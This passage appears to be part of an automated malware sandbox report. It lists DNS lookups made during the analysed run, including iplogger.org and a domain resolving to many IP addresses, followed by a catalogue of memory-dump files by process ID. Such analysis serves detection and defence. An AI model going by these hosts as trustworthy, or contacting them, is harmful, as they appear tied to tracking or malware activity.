                                                                                                                                                                                        62 B
                                                                                                                                                                                        107 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        www.facebook.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        31.13.83.36

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        58 B
                                                                                                                                                                                        74 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        iplogger.org

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        88.99.66.31

                                                                                                                                                                                      • 8.8.8.8:53
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        dns
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        64 B
                                                                                                                                                                                        224 B
                                                                                                                                                                                        1
                                                                                                                                                                                        1

                                                                                                                                                                                        DNS Request

                                                                                                                                                                                        lahuertasonora.com

                                                                                                                                                                                        DNS Response

                                                                                                                                                                                        84.40.106.91
                                                                                                                                                                                        91.203.174.38
                                                                                                                                                                                        1.247.35.250
                                                                                                                                                                                        121.67.142.131
                                                                                                                                                                                        211.53.230.69
                                                                                                                                                                                        118.129.116.119
                                                                                                                                                                                        61.253.197.172
                                                                                                                                                                                        121.67.118.220
                                                                                                                                                                                        196.200.111.5
                                                                                                                                                                                        123.215.94.239

                                                                                                                                                                                      MITRE ATT&CK Enterprise v6

                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                      Downloads

                                                                                                                                                                                      • memory/68-198-0x0000015A8A740000-0x0000015A8A7B1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/68-191-0x0000015A89CA0000-0x0000015A89CEC000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        304KB

                                                                                                                                                                                      • memory/184-232-0x0000000005120000-0x0000000005121000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/184-217-0x0000000004EB0000-0x0000000004EB1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/184-210-0x0000000004E10000-0x0000000004E11000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/184-207-0x0000000004F50000-0x0000000004F51000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/184-190-0x0000000000400000-0x000000000041E000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        120KB

                                                                                                                                                                                      • memory/184-206-0x0000000005570000-0x0000000005571000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/184-212-0x0000000004E70000-0x0000000004E71000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/848-168-0x0000000000CA0000-0x0000000000CA1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/932-227-0x0000017366760000-0x00000173667D1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/988-284-0x0000000000900000-0x00000000009AE000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        696KB

                                                                                                                                                                                      • memory/988-285-0x0000000000400000-0x00000000008F4000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        5.0MB

                                                                                                                                                                                      • memory/1084-221-0x0000025C2FB40000-0x0000025C2FBB1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/1196-255-0x000001A02C240000-0x000001A02C2B1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/1256-323-0x0000000005710000-0x0000000005711000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/1288-257-0x00000202F2340000-0x00000202F23B1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/1356-241-0x0000023DC6E00000-0x0000023DC6E71000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/1892-251-0x00000243BD940000-0x00000243BD9B1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/2084-295-0x000001C20D190000-0x000001C20D296000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.0MB

                                                                                                                                                                                      • memory/2084-294-0x000001C20C2F0000-0x000001C20C30B000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        108KB

                                                                                                                                                                                      • memory/2084-226-0x000001C20A980000-0x000001C20A9F1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/2156-165-0x00000000008C0000-0x00000000008C1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/2156-170-0x0000000000FF0000-0x0000000000FF1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/2156-176-0x000000001B4D0000-0x000000001B4D2000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        8KB

                                                                                                                                                                                      • memory/2156-172-0x0000000001020000-0x0000000001021000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/2156-171-0x0000000001000000-0x000000000101F000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        124KB

                                                                                                                                                                                      • memory/2272-204-0x00000152B4A70000-0x00000152B4AE1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/2332-213-0x0000018A666C0000-0x0000018A66731000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/2360-242-0x000002A307730000-0x000002A3077A1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/2384-252-0x0000018BDBF60000-0x0000018BDBFD1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/2468-132-0x000000006B280000-0x000000006B2A6000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        152KB

                                                                                                                                                                                      • memory/2468-135-0x0000000000400000-0x000000000051E000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.1MB

                                                                                                                                                                                      • memory/2468-133-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        100KB

                                                                                                                                                                                      • memory/2468-136-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        100KB

                                                                                                                                                                                      • memory/2468-134-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        100KB

                                                                                                                                                                                      • memory/2468-137-0x0000000064940000-0x0000000064959000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        100KB

                                                                                                                                                                                      • memory/2468-131-0x000000006FE40000-0x000000006FFC6000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.5MB

                                                                                                                                                                                      • memory/2468-130-0x000000006B440000-0x000000006B4CF000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        572KB

                                                                                                                                                                                      • memory/2620-287-0x0000000002590000-0x000000000262D000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        628KB

                                                                                                                                                                                      • memory/2620-288-0x0000000000400000-0x0000000000949000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        5.3MB

                                                                                                                                                                                      • memory/2752-222-0x0000022D02070000-0x0000022D020E1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/3120-296-0x00000000010A0000-0x00000000010B6000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        88KB

                                                                                                                                                                                      • memory/3644-335-0x0000000005430000-0x0000000005A36000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6.0MB

                                                                                                                                                                                      • memory/4000-214-0x000001C0F6F70000-0x000001C0F6FE1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        452KB

                                                                                                                                                                                      • memory/4088-188-0x0000000002FF8000-0x00000000030F9000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.0MB

                                                                                                                                                                                      • memory/4088-194-0x0000000004940000-0x000000000499D000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        372KB

                                                                                                                                                                                      • memory/4168-346-0x0000000005310000-0x0000000005311000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4188-349-0x00000000049A0000-0x0000000004A3D000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        628KB

                                                                                                                                                                                      • memory/4188-348-0x0000000004830000-0x0000000004894000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        400KB

                                                                                                                                                                                      • memory/4188-350-0x0000000000400000-0x000000000442B000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64.2MB

                                                                                                                                                                                      • memory/4224-331-0x0000000000400000-0x00000000043D1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        63.8MB

                                                                                                                                                                                      • memory/4224-330-0x0000000004420000-0x000000000444F000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        188KB

                                                                                                                                                                                      • memory/4272-259-0x0000000007190000-0x00000000071BE000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        184KB

                                                                                                                                                                                      • memory/4272-260-0x0000000007260000-0x0000000007261000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4272-253-0x0000000004A50000-0x0000000004A51000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4272-245-0x00000000002A0000-0x00000000002A1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4424-358-0x0000000004C90000-0x0000000004C91000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4440-264-0x0000000000BB0000-0x0000000000BB1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4440-268-0x000000000E1E0000-0x000000000E1E1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4440-266-0x0000000005350000-0x0000000005351000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4440-267-0x0000000005360000-0x0000000005370000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64KB

                                                                                                                                                                                      • memory/4440-270-0x00000000013B0000-0x00000000013B1000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4564-286-0x0000000004A80000-0x0000000004A81000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4608-317-0x00007FF96A480000-0x00007FF96A779000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3.0MB

                                                                                                                                                                                      • memory/4780-293-0x000000001AF40000-0x000000001AF42000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        8KB

                                                                                                                                                                                      • memory/4848-359-0x0000000077DD0000-0x0000000077F5E000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.6MB

                                                                                                                                                                                      • memory/4848-360-0x0000000005120000-0x0000000005121000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      • memory/4852-352-0x0000000004950000-0x00000000049ED000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        628KB

                                                                                                                                                                                      • memory/4852-353-0x0000000000400000-0x0000000004429000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64.2MB

                                                                                                                                                                                      • memory/4852-351-0x00000000047A0000-0x0000000004804000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        400KB

                                                                                                                                                                                      • memory/4984-361-0x0000000004C40000-0x0000000005246000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6.0MB

                                                                                                                                                                                      • memory/5004-362-0x00000000053E0000-0x00000000059E6000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6.0MB

                                                                                                                                                                                      • memory/5088-300-0x0000000004E10000-0x0000000004E11000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        4KB

                                                                                                                                                                                      We care about your privacy.

                                                                                                                                                                                      This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.